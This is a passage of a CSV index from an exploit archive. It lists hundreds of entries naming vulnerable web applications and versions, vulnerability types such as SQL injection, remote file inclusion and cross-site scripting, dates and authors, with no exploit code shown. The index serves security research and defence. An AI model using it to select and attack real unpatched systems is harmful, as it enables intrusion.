Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29790,exploits/php/webapps/29790.txt,"ImpressPages CMS 3.8 - Persistent Cross-Site Scripting",2013-11-23,sajith,php,webapps, -29658,exploits/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",php,webapps, -29661,exploits/php/webapps/29661.txt,"Docebo CMS 3.0.x - 'index.php?searchkey' Cross-Site Scripting",2007-02-24,r00t,php,webapps, -29662,exploits/php/webapps/29662.txt,"Docebo CMS 3.0.x - '/modules/htmlframechat/index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-02-24,r00t,php,webapps, -29663,exploits/php/webapps/29663.txt,"SolarPay - 'index.php' Local File Inclusion",2007-02-26,"Hasadya Raed",php,webapps, -29665,exploits/php/webapps/29665.txt,"SQLiteManager 1.2 - Local File Inclusion",2007-02-26,"Simon Bonnard",php,webapps, -29667,exploits/php/webapps/29667.txt,"WordPress Theme Euclid 1.x - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29668,exploits/php/webapps/29668.txt,"WordPress Theme Dimension - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29669,exploits/php/webapps/29669.txt,"WordPress Theme Amplus - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -29670,exploits/php/webapps/29670.txt,"WordPress Theme Make A Statement (MaS) - Cross-Site Request Forgery",2013-11-18,DevilScreaM,php,webapps,80 -30367,exploits/php/webapps/30367.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/membersearch.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-23,Lostmon,php,webapps, -30189,exploits/jsp/webapps/30189.txt,"Apache Tomcat 6.0.13 - JSP Example Web Applications Cross-Site Scripting",2007-06-14,anonymous,jsp,webapps, -30190,exploits/php/webapps/30190.txt,"Joomla! Component Letterman Subscriber Module 1.2.4 - 'Mod_Lettermansubscribe.php' Cross-Site Scripting",2007-06-14,"Edi Strosar",php,webapps, -30191,exploits/jsp/webapps/30191.txt,"Apache MyFaces Tomahawk JSF Framework 1.1.5 - 'Autoscroll' Cross-Site Scripting",2007-06-14,"Rajat Swarup",jsp,webapps, -29672,exploits/php/webapps/29672.txt,"LiveZilla 5.0.1.4 - Remote Code Execution",2013-11-18,"Curesec Research Team",php,webapps,80 -29673,exploits/hardware/webapps/29673.txt,"Dahua DVR 2.608.0000.0/2.608.GV00.0 - Authentication Bypass (Metasploit)",2013-11-18,"Jake Reynolds",hardware,webapps,37777 -29674,exploits/jsp/webapps/29674.txt,"ManageEngine DesktopCentral 8.0.0 build < 80293 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,jsp,webapps, -29675,exploits/asp/webapps/29675.txt,"Kaseya < 6.3.0.2 - Arbitrary File Upload",2013-11-18,Security-Assessment.com,asp,webapps, -29789,exploits/php/webapps/29789.txt,"LimeSurvey 2.00+ (build 131107) - Multiple Vulnerabilities",2013-11-23,LiquidWorm,php,webapps, -29694,exploits/php/webapps/29694.txt,"S9Y Serendipity 1.1.1 - 'index.php' SQL Injection",2007-03-01,Samenspender,php,webapps, -29696,exploits/php/webapps/29696.txt,"aWebNews 1.1 - 'listing.php?path_to_news' Remote File Inclusion",2007-03-01,mostafa_ragab,php,webapps, -29697,exploits/php/webapps/29697.txt,"Built2go News Manager 1.0 Blog - 'news.php' Multiple Cross-Site Scripting Vulnerabilities",2007-03-01,the_Edit0r,php,webapps, -29698,exploits/php/webapps/29698.txt,"Built2go News Manager 1.0 Blog - 'rating.php?nid' Cross-Site Scripting",2007-03-01,the_Edit0r,php,webapps, -29700,exploits/php/webapps/29700.txt,"Woltlab Burning Board 2.3.6 - Multiple HTML Injection Vulnerabilities",2007-03-02,Samenspender,php,webapps, -29701,exploits/php/webapps/29701.txt,"WordPress 2.1.1 - Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps, -29702,exploits/php/webapps/29702.txt,"WordPress 2.1.1 - '/wp-includes/theme.php?iz' Arbitrary Command Execution",2007-03-02,"Ivan Fratric",php,webapps, -29703,exploits/php/webapps/29703.txt,"Tyger Bug Tracking System 1.1.3 - 'ViewBugs.php?s' SQL Injection",2007-02-26,CorryL,php,webapps, -29704,exploits/php/webapps/29704.txt,"Tyger Bug Tracking System 1.1.3 - 'login.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps, -29705,exploits/php/webapps/29705.txt,"Tyger Bug Tracking System 1.1.3 - 'register.php?PATH_INFO' Cross-Site Scripting",2007-02-26,CorryL,php,webapps, -29709,exploits/hardware/webapps/29709.txt,"Ruckus Wireless Zoneflex 2942 Wireless Access Point - Authentication Bypass",2013-11-19,myexploit,hardware,webapps,80 -30368,exploits/php/webapps/30368.txt,"Alstrasoft Sms Text Messaging Enterprise 2.0 - '/admin/edituser.php?userid' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps, -30369,exploits/php/webapps/30369.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'index.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps, -30370,exploits/php/webapps/30370.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'temp.php' Cross-Site Scripting",2007-07-23,Lostmon,php,webapps, -30371,exploits/php/webapps/30371.txt,"Alstrasoft Affiliate Network Pro 8.0 - 'pgmid' SQL Injection",2007-07-23,Lostmon,php,webapps, -29715,exploits/php/webapps/29715.txt,"EPortfolio 1.0 - Client-Side Input Validation",2007-03-05,"Stefan Friedli",php,webapps, -29722,exploits/php/webapps/29722.txt,"JCCorp URLShrink Free 1.3.1 - 'CreateURL.php' Remote File Inclusion",2007-03-09,"Hasadya Raed",php,webapps, -29726,exploits/asp/webapps/29726.pl,"Duyuru Scripti - 'Goster.asp' SQL Injection",2007-03-09,Cr@zy_King,asp,webapps, -29727,exploits/php/webapps/29727.txt,"Premod SubDog 2 - '/includes/functions_kb.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps, -29728,exploits/php/webapps/29728.txt,"Premod SubDog 2 - '/includes/themen_portal_mitte.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps, -29729,exploits/php/webapps/29729.txt,"Premod SubDog 2 - '/includes/logger_engine.php?phpbb_root_path' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps, -29730,exploits/php/webapps/29730.txt,"SoftNews 4.1/5.5 - '/engine/init.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps, -29731,exploits/php/webapps/29731.txt,"SoftNews 4.1/5.5 - '/engine/Ajax/editnews.php?root_dir' Remote File Inclusion",2007-03-10,"Hasadya Raed",php,webapps, -29733,exploits/php/webapps/29733.txt,"PHP-Nuke 8.2.4 - Multiple Vulnerabilities",2013-11-20,"Sojobo dev team",php,webapps,80 -29736,exploits/php/webapps/29736.txt,"ClipShare 1.5.3 - 'ADODB-Connection.Inc.php' Remote File Inclusion",2007-03-12,"RaeD Hasadya",php,webapps, -29737,exploits/php/webapps/29737.txt,"Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion",2007-03-13,"BorN To K!LL",php,webapps, -29742,exploits/php/webapps/29742.txt,"Horde IMP Webmail 4.0.4 Client - Multiple Input Validation Vulnerabilities",2007-03-15,"Immerda Project Group",php,webapps, -29744,exploits/php/webapps/29744.txt,"Viper Web Portal 0.1 - 'index.php' Remote File Inclusion",2007-03-15,"Abdus Samad",php,webapps, -29745,exploits/php/webapps/29745.txt,"Horde Framework 3.1.3 - 'login.php' Cross-Site Scripting",2007-03-15,"Moritz Naumann",php,webapps, -29747,exploits/php/webapps/29747.txt,"DirectAdmin 1.292 - 'CMD_USER_STATS' Cross-Site Scripting",2007-03-16,Mandr4ke,php,webapps, -29748,exploits/php/webapps/29748.txt,"Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal",2007-03-16,"BorN To K!LL",php,webapps, -29750,exploits/php/webapps/29750.php,"phpStats 0.1.9 - Multiple SQL Injections",2007-03-16,rgod,php,webapps, -29751,exploits/php/webapps/29751.php,"phpStats 0.1.9 - 'PHP-Stats-options.php' Remote Code Execution",2007-03-17,rgod,php,webapps, -29754,exploits/php/webapps/29754.html,"WordPress < 2.1.2 - 'PHP_Self' Cross-Site Scripting",2007-03-19,"Alexander Concha",php,webapps, -29755,exploits/php/webapps/29755.html,"Guesbara 1.2 - Administrator Password Change",2007-03-19,Kacper,php,webapps, -29756,exploits/php/webapps/29756.txt,"PHPX 3.5.15/3.5.16 - 'print.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps, -29757,exploits/php/webapps/29757.txt,"PHPX 3.5.15/3.5.16 - 'forums.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps, -29758,exploits/php/webapps/29758.txt,"PHPX 3.5.15/3.5.16 - 'users.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps, -29759,exploits/php/webapps/29759.php,"PHPX 3.5.15/3.5.16 - 'news.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps, -29760,exploits/php/webapps/29760.txt,"PHPX 3.5.15/3.5.16 - 'gallery.php' SQL Injection",2007-03-19,"laurent gaffie",php,webapps, -29761,exploits/cgi/webapps/29761.txt,"LedgerSMB1.0/1.1 / SQL-Ledger 2.6.x - 'Login' Local File Inclusion / Authentication Bypass",2007-03-19,"Chris Travers",cgi,webapps, -29762,exploits/php/webapps/29762.txt,"Web Wiz Forums 8.05 - String Filtering SQL Injection",2007-03-20,"Ivan Fratric",php,webapps, -29763,exploits/php/webapps/29763.php,"W-Agora 4.2.1 - Multiple Arbitrary File Upload Vulnerabilities",2007-03-20,"laurent gaffie",php,webapps, -29764,exploits/php/webapps/29764.txt,"W-Agora 4.2.1 - 'profile.php?showuser' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps, -29765,exploits/php/webapps/29765.txt,"W-Agora 4.2.1 - 'search.php?search_user' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps, -29766,exploits/php/webapps/29766.txt,"W-Agora 4.2.1 - 'change_password.php?userid' Cross-Site Scripting",2007-03-20,"laurent gaffie",php,webapps, -29772,exploits/php/webapps/29772.txt,"Free File Hosting System 1.1 - 'contact.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps, -29773,exploits/php/webapps/29773.txt,"Free File Hosting System 1.1 - 'login.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps, -29774,exploits/php/webapps/29774.txt,"Free File Hosting System 1.1 - 'register.php?AD_BODY_TEMP' Remote File Inclusion",2007-03-24,IbnuSina,php,webapps, -29775,exploits/php/webapps/29775.txt,"Image_Upload Script 2.0 - Multiple Remote File Inclusions",2007-03-26,Crackers_Child,php,webapps, -29776,exploits/php/webapps/29776.txt,"CcCounter 2.0 - 'index.php' Cross-Site Scripting",2007-03-26,Crackers_Child,php,webapps, -29780,exploits/php/webapps/29780.txt,"Mephisto Blog 0.7.3 - Search Function Cross-Site Scripting",2007-03-26,The[Boss],php,webapps, -29782,exploits/php/webapps/29782.txt,"Satel Lite - 'Satellite.php' Local File Inclusion",2007-11-26,rUnViRuS,php,webapps, -29783,exploits/php/webapps/29783.txt,"Fizzle 0.5 - RSS Feed HTML Injection",2007-03-26,"CrYpTiC MauleR",php,webapps, -29786,exploits/php/webapps/29786.txt,"aBitWhizzy - 'whizzylink.php?d' Traversal Arbitrary Directory Listing",2007-03-14,Lostmon,php,webapps, -30105,exploits/php/webapps/30105.txt,"WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting",2013-12-08,"Jeroen - IT Nerdbox",php,webapps, -30157,exploits/php/webapps/30157.txt,"Joomla! Component JD-Wiki 1.0.2 - 'dwpage.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps, -30158,exploits/php/webapps/30158.txt,"Joomla! Component JD-Wiki 1.0.2 - 'wantedpages.php?MosConfig_absolute_path' Remote File Inclusion",2007-06-06,DarkbiteX,php,webapps, -30107,exploits/php/webapps/30107.txt,"Ovidentia 7.9.6 - Multiple Vulnerabilities",2013-12-08,sajith,php,webapps, -30109,exploits/php/webapps/30109.txt,"Particle Gallery 1.0 - 'search.php' Cross-Site Scripting",2007-05-30,Serapis.net,php,webapps, -30111,exploits/php/webapps/30111.txt,"MyBloggie 2.1.x - 'index.php' Multiple SQL Injections",2007-05-31,ls@calima.serapis.net,php,webapps, -30112,exploits/php/webapps/30112.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php?iCategoryUnq' SQL Injection",2007-05-31,"laurent gaffie",php,webapps, -30113,exploits/php/webapps/30113.txt,"PHP JackKnife 2.21 - '/(PHPJK) Search/DisplayResults.php?iSearchID' SQL Injection",2007-05-31,"laurent gaffie",php,webapps, -30114,exploits/php/webapps/30114.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/Authenticate.php?sUName' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps, -30115,exploits/php/webapps/30115.txt,"PHP JackKnife 2.21 - '/(PHPJK) UserArea/NewAccounts/index.php?sAccountUnq' Cross-Site Scripting",2007-05-31,"laurent gaffie",php,webapps, -30116,exploits/php/webapps/30116.txt,"PHP JackKnife 2.21 - '(PHPJK) G_Display.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-31,"laurent gaffie",php,webapps, -30118,exploits/php/webapps/30118.txt,"Prototype of an PHP Application 0.1 - '/gestion/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30119,exploits/php/webapps/30119.txt,"Prototype of an PHP Application 0.1 - '/ident/identification.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30120,exploits/php/webapps/30120.txt,"Prototype of an PHP Application 0.1 - '/ident/disconnect.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30121,exploits/php/webapps/30121.txt,"Prototype of an PHP Application 0.1 - '/ident/loginliste.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30122,exploits/php/webapps/30122.txt,"Prototype of an PHP Application 0.1 - '/ident/loginmodif.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30123,exploits/php/webapps/30123.txt,"Prototype of an PHP Application 0.1 - '/ident/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30124,exploits/php/webapps/30124.txt,"Prototype of an PHP Application 0.1 - '/ident/ident.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30125,exploits/php/webapps/30125.txt,"Prototype of an PHP Application 0.1 - '/menu/menuprincipal.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30126,exploits/php/webapps/30126.txt,"Prototype of an PHP Application 0.1 - 'param.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30127,exploits/php/webapps/30127.txt,"Prototype of an PHP Application 0.1 - '/plugins/PHPgacl/index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30128,exploits/php/webapps/30128.txt,"Prototype of an PHP Application 0.1 - 'index.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30129,exploits/php/webapps/30129.txt,"Prototype of an PHP Application 0.1 - 'common.inc.php?path_inc' Remote File Inclusion",2007-06-01,"pito pito",php,webapps, -30131,exploits/php/webapps/30131.txt,"Buttercup WFM - 'Title' Cross-Site Scripting",2007-06-01,"John Martinelli",php,webapps, -30132,exploits/php/webapps/30132.txt,"Evenzia Content Management Systems (CMS) - Cross-Site Scripting",2007-06-01,"Glafkos Charalambous",php,webapps, -30133,exploits/php/webapps/30133.txt,"PHPLive! 3.2.2 - 'chat.php?sid' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps, -30134,exploits/php/webapps/30134.txt,"PHPLive! 3.2.2 - 'help.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps, -30135,exploits/php/webapps/30135.txt,"PHPLive! 3.2.2 - '/admin/header.php?admin[name]' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps, -30136,exploits/php/webapps/30136.txt,"PHPLive! 3.2.2 - '/super/info.php?BASE_URL' Cross-Site Scripting",2007-06-01,ReZEN,php,webapps, -30137,exploits/php/webapps/30137.txt,"PHPLive! 3.2.2 - '/setup/footer.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-01,ReZEN,php,webapps, -30138,exploits/php/webapps/30138.txt,"Linker 2.0.4 - 'index.php' Cross-Site Scripting",2007-06-02,vagrant,php,webapps, -30140,exploits/php/webapps/30140.txt,"Okyanusmedya - 'index.php' Cross-Site Scripting",2007-06-04,vagrant,php,webapps, -30141,exploits/asp/webapps/30141.txt,"Hunkaray Okul Portaly 1.1 - 'Haberoku.asp' SQL Injection",2007-06-04,ertuqrul,asp,webapps, -30143,exploits/php/webapps/30143.txt,"WebStudio CMS - 'index.php' Cross-Site Scripting",2007-06-04,"Glafkos Charalambous",php,webapps, -30145,exploits/ios/webapps/30145.txt,"Feetan Inc WireShare 1.9.1 iOS - Persistent",2013-12-08,Vulnerability-Lab,ios,webapps, -30146,exploits/ios/webapps/30146.txt,"Print n Share 5.5 iOS - Multiple Web Vulnerabilities",2013-12-08,Vulnerability-Lab,ios,webapps, -30152,exploits/php/webapps/30152.txt,"My Databook - 'diary.php?delete' SQL Injection",2007-06-04,Serapis.net,php,webapps, -30153,exploits/php/webapps/30153.txt,"My Databook - 'diary.php?year' Cross-Site Scripting",2007-06-04,Serapis.net,php,webapps, -30159,exploits/asp/webapps/30159.txt,"ASP Folder Gallery - 'Download_Script.asp' Arbitrary File Download",2007-06-06,freeprotect.net,asp,webapps, -30161,exploits/php/webapps/30161.txt,"Atom Photoblog 1.0.1/1.0.9 - 'AtomPhotoblog.php' Multiple Input Validation Vulnerabilities",2007-06-07,Serapis.net,php,webapps, -30162,exploits/php/webapps/30162.txt,"WMSCMS 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-07,"Glafkos Charalambous",php,webapps, -30165,exploits/asp/webapps/30165.txt,"Ibrahim Ã?AKICI - 'Okul Portal Haber_Oku.asp' SQL Injection",2007-06-08,ertuqrul,asp,webapps, -30166,exploits/php/webapps/30166.txt,"WordPress 2.2 - 'Request_URI' Cross-Site Scripting",2007-06-08,zamolx3,php,webapps, -30168,exploits/php/webapps/30168.txt,"vBSupport 2.0.0 Integrated Ticket System - 'vBSupport.php' SQL Injection",2007-06-09,rUnViRuS,php,webapps, -30171,exploits/php/webapps/30171.txt,"JFFNms 0.8.3 - 'auth.php' Multiple SQL Injections",2007-06-11,"Tim Brown",php,webapps, -30172,exploits/php/webapps/30172.txt,"JFFNms 0.8.3 - 'auth.php?user' Cross-Site Scripting",2007-06-11,"Tim Brown",php,webapps, -30173,exploits/php/webapps/30173.txt,"JFFNms 0.8.3 - 'admin/adm/test.php' PHP Information Disclosure",2007-06-11,"Tim Brown",php,webapps, -30174,exploits/php/webapps/30174.txt,"JFFNms 0.8.3 - 'admin/setup.php' Direct Request Authentication Bypass",2007-06-11,"Tim Brown",php,webapps, -30175,exploits/php/webapps/30175.txt,"bbPress 0.8.1 - 'BB-login.php' Cross-Site Scripting",2007-06-11,"Ory Segal",php,webapps, -30177,exploits/php/webapps/30177.txt,"PlaySms 0.9.9.2 - Cross-Site Request Forgery",2013-12-10,"Saadi Siddiqui",php,webapps, -30205,exploits/asp/webapps/30205.txt,"Comersus Cart 7.0.7 - 'comersus_message.asp' redirectUrl Cross-Site Scripting",2007-06-20,Doz,asp,webapps, -30206,exploits/cfm/webapps/30206.txt,"FuseTalk 4.0 - 'forum/include/common/comfinish.cfm?FTVAR_SCRIPTRUN' Cross-Site Scripting",2007-06-20,"Ivan Almuina",cfm,webapps, -30202,exploits/cfm/webapps/30202.txt,"FuseTalk 2.0/3.0 - 'AuthError.cfm' SQL Injection",2007-06-19,"Ivan Almuina",cfm,webapps, -29794,exploits/hardware/webapps/29794.txt,"Pirelli Discus DRG A125g - Remote Change SSID Value",2013-11-24,"Sebastián Magof",hardware,webapps, -29795,exploits/hardware/webapps/29795.pl,"Pirelli Discus DRG A125g - Local Password Disclosure",2013-11-24,"Sebastián Magof",hardware,webapps, -29796,exploits/hardware/webapps/29796.pl,"Pirelli Discus DRG A125g - Remote Change WiFi Password",2013-11-24,"Sebastián Magof",hardware,webapps, -29797,exploits/php/webapps/29797.txt,"MyBB Ajaxfs 2 Plugin - SQL Injection",2013-11-24,"IeDb ir",php,webapps, -29802,exploits/hardware/webapps/29802.txt,"TP-Link WR740N/WR740ND - Multiple Cross-Site Request Forgery Vulnerabilities",2013-11-25,"Samandeep Singh",hardware,webapps, -29805,exploits/php/webapps/29805.txt,"Drake CMS 0.3.7 - '404.php' Local File Inclusion",2007-03-30,"HACKERS PAL",php,webapps, -29806,exploits/php/webapps/29806.pl,"PHP-Fusion 6.1.5 Mod Calendar_Panel - 'Show_Event.php' SQL Injection",2007-03-31,UNIQUE-KEY,php,webapps, -29817,exploits/asp/webapps/29817.txt,"Gazi Okul Sitesi 2007 - 'Fotokategori.asp' SQL Injection",2007-04-04,CoNqUeRoR,asp,webapps, -29821,exploits/php/webapps/29821.txt,"Livor 2.5 - 'index.php' Cross-Site Scripting",2007-04-06,"Arham Muhammad",php,webapps, -29824,exploits/php/webapps/29824.txt,"QuizShock 1.6.1 - 'auth.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps, -29825,exploits/php/webapps/29825.txt,"UBBCentral UBB.Threads 6.1.1 - 'UBBThreads.php' SQL Injection",2007-04-09,"John Martinelli",php,webapps, -29827,exploits/php/webapps/29827.pl,"eCardMAX HotEditor 4.0 - 'Keyboard.php' Local File Inclusion",2007-04-09,Liz0ziM,php,webapps, -29828,exploits/php/webapps/29828.html,"DeskPro 2.0.1 - 'login.php' HTML Injection",2007-04-09,"John Martinelli",php,webapps, -29829,exploits/php/webapps/29829.txt,"Einfacher Passworschutz - 'index.php' Cross-Site Scripting",2007-04-10,hackberry,php,webapps, -29830,exploits/php/webapps/29830.txt,"MyNews 4.2.2 - 'Week_Events.php' Remote File Inclusion",2007-04-10,hackberry,php,webapps, -29831,exploits/php/webapps/29831.txt,"DropAFew 0.2 - 'newaccount2.php' Arbitrary Account Creation",2007-04-10,"Alexander Klink",php,webapps, -29832,exploits/php/webapps/29832.txt,"DropAFew 0.2 - 'search.php?delete Action id' SQL Injection",2007-04-10,"Alexander Klink",php,webapps, -29833,exploits/php/webapps/29833.txt,"DropAFew 0.2 - 'editlogcal.php?save Action calories' SQL Injection",2007-04-10,"Alexander Klink",php,webapps, -29834,exploits/php/webapps/29834.txt,"WordPress Plugin dzs-videogallery - Arbitrary File Upload",2013-11-26,link_satisi,php,webapps, -29838,exploits/php/webapps/29838.txt,"DotClear 1.2.x - '/ecrire/trackback.php?post_id' Cross-Site Scripting",2007-04-11,nassim,php,webapps, -29839,exploits/php/webapps/29839.txt,"DotClear 1.2.x - '/tools/thememng/index.php?tool_url' Cross-Site Scripting",2007-04-11,nassim,php,webapps, -29841,exploits/php/webapps/29841.txt,"PHPFaber TopSites 3 - 'admin/index.php' Directory Traversal",2007-04-11,Dr.RoVeR,php,webapps, -29842,exploits/cgi/webapps/29842.txt,"Cosign 2.0.1/2.9.4a - CGI Check Cookie Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps, -29844,exploits/cgi/webapps/29844.txt,"Cosign 2.0.1/2.9.4a - CGI Register Command Remote Authentication Bypass",2007-04-11,"Jon Oberheide",cgi,webapps, -29845,exploits/php/webapps/29845.txt,"PHPwebnews 0.1 - 'iklan.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps, -29846,exploits/php/webapps/29846.txt,"PHPwebnews 0.1 - 'index.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps, -29847,exploits/php/webapps/29847.txt,"PHPwebnews 0.1 - 'bukutamu.php' Cross-Site Scripting",2007-04-07,the_Edit0r,php,webapps, -29848,exploits/php/webapps/29848.txt,"TuMusika Evolution 1.6 - 'index.php' Cross-Site Scripting",2007-04-12,the_Edit0r,php,webapps, -29849,exploits/php/webapps/29849.html,"ToendaCMS 1.5.3 - GET / POST Forms HTML Injection",2007-04-12,"Hanno Boeck",php,webapps, -29851,exploits/php/webapps/29851.txt,"MailBee WebMail Pro 3.4 - 'Check_login.asp' Cross-Site Scripting",2007-04-13,"David Vieira-Kurz",php,webapps, -29852,exploits/php/webapps/29852.txt,"Doop Content Management System 1.3.x - Multiple Input Validation Vulnerabilities",2007-04-13,KaBuS,php,webapps, -29854,exploits/php/webapps/29854.txt,"BloofoxCMS 0.2.2 - 'Img_Popup.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps, -29855,exploits/php/webapps/29855.txt,"Flowers - 'Cas.php' Cross-Site Scripting",2007-04-14,the_Edit0r,php,webapps, -29861,exploits/php/webapps/29861.txt,"Palo Alto Networks Pan-OS 5.0.8 - Multiple Vulnerabilities",2013-11-27,"Thomas Pollet",php,webapps, -29862,exploits/php/webapps/29862.pl,"Web Service Deluxe News Manager 1.0.1 Deluxe - 'footer.php' Local File Inclusion",2007-04-16,BeyazKurt,php,webapps, -29863,exploits/php/webapps/29863.txt,"Actionpoll 1.1 - 'Actionpoll.php' Remote File Inclusion",2007-04-16,SekoMirza,php,webapps, -29864,exploits/php/webapps/29864.php,"MyBlog 0.9.8 - 'Settings.php' Authentication Bypass",2007-04-16,BlackHawk,php,webapps, -29865,exploits/php/webapps/29865.txt,"Wabbit Gallery Script 0.9 - 'showpic.php' Multiple Cross-Site Scripting Vulnerabilities",2007-04-17,the_Edit0r,php,webapps, -29866,exploits/php/webapps/29866.txt,"PHP-Nuke 8.0.3.3b - SQL Injection Protection Bypass / Multiple SQL Injections",2007-04-17,Aleksandar,php,webapps, -29868,exploits/php/webapps/29868.txt,"NuclearBB Alpha 1 - Multiple SQL Injections",2007-04-18,"John Martinelli",php,webapps, -29869,exploits/php/webapps/29869.php,"Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion",2007-04-19,"HACKERS PAL",php,webapps, -29870,exploits/php/webapps/29870.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_debug.php?url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps, -29871,exploits/php/webapps/29871.txt,"Exponent CMS 0.96.5/0.96.6 - 'magpie_slashbox.php?rss_url' Cross-Site Scripting",2007-04-20,"Hamid Ebadi",php,webapps, -29872,exploits/php/webapps/29872.txt,"Exponent CMS 0.96.5/0.96.6 - 'iconspopup.php?icodir' Traversal Arbitrary Directory Listing",2007-04-20,"Hamid Ebadi",php,webapps, -29874,exploits/php/webapps/29874.txt,"PHP Turbulence 0.0.1 - 'Turbulence.php' Remote File Inclusion",2007-04-20,Omni,php,webapps, -29876,exploits/php/webapps/29876.txt,"TJSChat 0.95 - 'You.php' Cross-Site Scripting",2007-04-23,the_Edit0r,php,webapps, -29877,exploits/php/webapps/29877.html,"Ripe Website Manager 0.8.4 - '/contact/index.php?ripeformpost' SQL Injection",2007-04-23,"John Martinelli",php,webapps, -29878,exploits/php/webapps/29878.txt,"Allfaclassifieds 6.04 - 'Level2.php' Remote File Inclusion",2007-04-23,Dr.RoVeR,php,webapps, -29879,exploits/php/webapps/29879.txt,"PHPMyBibli 1.32 - 'Init.Inc.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps, -29880,exploits/php/webapps/29880.txt,"File117 - Multiple Remote File Inclusions",2007-04-23,InyeXion,php,webapps, -29882,exploits/php/webapps/29882.html,"PHPMySpace Gold 8.10 - 'article.php' SQL Injection",2007-04-23,"John Martinelli",php,webapps, -29883,exploits/php/webapps/29883.txt,"ACVSWS - 'Transport.php' Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps, -29885,exploits/php/webapps/29885.txt,"Claroline 1.x - RootSys Remote File Inclusion",2007-04-23,MoHaNdKo,php,webapps, -29886,exploits/php/webapps/29886.txt,"Lms 1.5.x - 'RTMessageAdd.php' Remote File Inclusion",2007-04-23,InyeXion,php,webapps, -29887,exploits/php/webapps/29887.txt,"Phorum 5.1.20 - 'admin.php?Groups Module group_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps, -29888,exploits/php/webapps/29888.txt,"Phorum 5.1.20 - 'admin.php?modsettings Module smiley_id' Cross-Site Scripting",2007-04-23,"Janek Vind",php,webapps, -29889,exploits/php/webapps/29889.txt,"Phorum 5.1.20 - '/include/controlcenter/users.php' Multiple Method Privilege Escalations",2007-04-23,"Janek Vind",php,webapps, -29890,exploits/php/webapps/29890.txt,"Phorum 5.1.20 - 'admin.php?module[]' Full Path Disclosure",2007-04-23,"Janek Vind",php,webapps, -29891,exploits/php/webapps/29891.txt,"Phorum 5.1.20 - '/include/admin/banlist.php?delete' Cross-Site Request Forgery Banlist Deletion",2007-04-23,"Janek Vind",php,webapps, -29892,exploits/php/webapps/29892.html,"Phorum 5.1.20 - 'pm.php' Recipient Name SQL Injection",2007-04-23,"Janek Vind",php,webapps, -29893,exploits/php/webapps/29893.txt,"Phorum 5.1.20 - 'admin.php' badwords/banlist Module SQL Injection",2007-04-23,"Janek Vind",php,webapps, -29894,exploits/php/webapps/29894.txt,"Phorum 5.1.20 - 'admin.php' Groups Module Edit/Add Group Field SQL Injection",2007-04-23,"Janek Vind",php,webapps, -29895,exploits/php/webapps/29895.txt,"phpMyAdmin 2.9.1 - Multiple Cross-Site Scripting Vulnerabilities",2007-04-24,sp3x@securityreason.com,php,webapps, -29898,exploits/php/webapps/29898.txt,"plesk 8.1.1 - 'login.php3' Directory 